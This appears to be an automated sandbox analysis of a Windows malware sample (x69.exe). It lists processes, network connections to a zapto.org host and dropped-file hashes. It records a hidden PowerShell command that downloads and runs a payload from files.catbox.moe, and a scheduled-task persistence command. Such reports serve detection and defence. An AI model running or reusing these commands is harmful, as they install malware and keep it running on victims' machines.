C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\x69.exe

"C:\Users\Admin\AppData\Local\Temp\x69.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP Bypass -W Hidden -C "iwr 'https://files.catbox.moe/8ruqew.rar' -OutFile $env:TEMP\MasonKit.com; Start-Process -WindowStyle Hidden $env:TEMP\MasonKit.com"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\MasonKit.com

"C:\Users\Admin\AppData\Local\Temp\MasonKit.com"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"

C:\Users\Admin\AppData\Local\Temp\MasonR.bat

"C:\Users\Admin\AppData\Local\Temp\MasonR.bat"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{742a7f0f-e5c2-4a52-b3bb-c750adbe5391}

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe ccca352727b8f4cbe855cf200336a615 Qni2/g22ikaKUxCH80CEMA.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.35:443 files.catbox.moe tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 grayhatgroupontop.zapto.org udp
EG 197.160.170.172:1177 grayhatgroupontop.zapto.org tcp
GB 2.18.27.76:443 www.bing.com tcp
EG 197.160.170.172:1177 grayhatgroupontop.zapto.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/380-0-0x00007FFA58873000-0x00007FFA58875000-memory.dmp

memory/380-1-0x0000000000770000-0x0000000000782000-memory.dmp

memory/1700-2-0x0000017569BD0000-0x0000017569BF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ivcmjw.vrb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1700-12-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

memory/1700-13-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

memory/1700-14-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MasonKit.com

MD5 cc08b88c7b9ef35411f7ad9b8952d390
SHA1 315c2052a1d8eefc76df94b8fa7b52c037d2ea98
SHA256 83c839ff8e487d87992434bd395fb610ce6238c673c4e798724f2a34b6bb68d4
SHA512 74c74b03f2c9d14bff1ddcd9259fa58405f7f6f0f50f09d240c131e4258be4046a745ef918861ec0ccc8f6533008473d71c9f1c43b6805b8fa8fec403a12ee24

memory/5688-22-0x00000000001E0000-0x000000000027E000-memory.dmp

memory/5688-23-0x00000000022E0000-0x0000000002378000-memory.dmp

memory/1700-26-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MasonR.bat

MD5 ae78843b23f7a1c65f6b9a5a031f1950
SHA1 a12aad340d3eafb919d6cf38fad402f29b570ed0
SHA256 8de8fd340cd8057899781e8796f36543092cdfa9028958102bd5fec9f2070447
SHA512 648e6f7eeadf9d1ab2ba36311259a20f5b55c16a04a271fe7e7f3ee166e626aea6c6d97e9e5b4f8c9d1d997ab1444bcd1ff5dfa61bd9f1b988c58e30d40dc3b5

memory/3160-33-0x0000023605B20000-0x0000023605BBA000-memory.dmp

memory/3160-35-0x00007FFA74D40000-0x00007FFA74DFE000-memory.dmp

memory/3160-34-0x00007FFA76910000-0x00007FFA76B05000-memory.dmp

memory/4812-38-0x0000000140000000-0x00000001401A1000-memory.dmp

memory/4812-40-0x00007FFA74D40000-0x00007FFA74DFE000-memory.dmp

memory/4812-36-0x0000000140000000-0x00000001401A1000-memory.dmp

memory/380-41-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

memory/4812-39-0x00007FFA76910000-0x00007FFA76B05000-memory.dmp

memory/668-57-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/668-59-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/376-68-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/948-75-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/1028-95-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/1100-99-0x0000024F80D40000-0x0000024F80EFB000-memory.dmp

memory/1028-96-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/1028-94-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/1028-93-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/1028-92-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/1028-91-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/540-83-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/540-82-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/540-81-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/540-80-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/540-79-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/540-78-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/1100-98-0x0000024F80D40000-0x0000024F80EFB000-memory.dmp

memory/948-74-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/948-73-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/948-72-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/948-71-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/948-70-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/376-67-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/376-66-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/376-64-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/376-63-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/668-58-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/668-56-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/668-55-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/668-54-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/616-51-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/616-50-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/616-49-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/616-48-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/376-65-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/616-46-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/616-45-0x000001BADFD10000-0x000001BADFE4E000-memory.dmp

memory/616-47-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/4812-42-0x0000000140000000-0x00000001401A1000-memory.dmp

memory/380-614-0x00007FFA58873000-0x00007FFA58875000-memory.dmp

C:\Users\Admin\AppData\Roaming\x69.exe

MD5 c1ade7728d9871043141fde331aebcf2
SHA1 c9ebed22e028ff8d2e05dea75f04b2e4ca692d17
SHA256 8ead895e1e76dc258954703305da5eed934eb7744eddf4d1b481c70fddefcef6
SHA512 97a03bd5194a436b58a01348947cfe3793fac65b5d8b3bb70ce30240d3522ea44f7713548373fcae40f979693e879bef69a72202e3f8fc29f3d731a058b7f6ba

memory/3984-656-0x0000000000F50000-0x0000000000F62000-memory.dmp

memory/380-659-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890